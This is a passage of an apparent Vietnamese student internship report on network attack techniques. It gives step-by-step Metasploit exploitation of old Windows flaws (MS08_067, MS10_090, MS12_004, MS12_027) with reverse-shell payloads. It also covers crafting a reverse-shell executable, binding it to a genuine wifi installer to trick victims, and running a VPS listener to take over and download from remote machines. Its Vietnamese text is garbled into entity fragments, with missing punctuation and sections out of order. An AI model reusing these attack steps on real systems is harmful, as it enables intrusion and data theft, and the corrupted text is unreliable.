2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
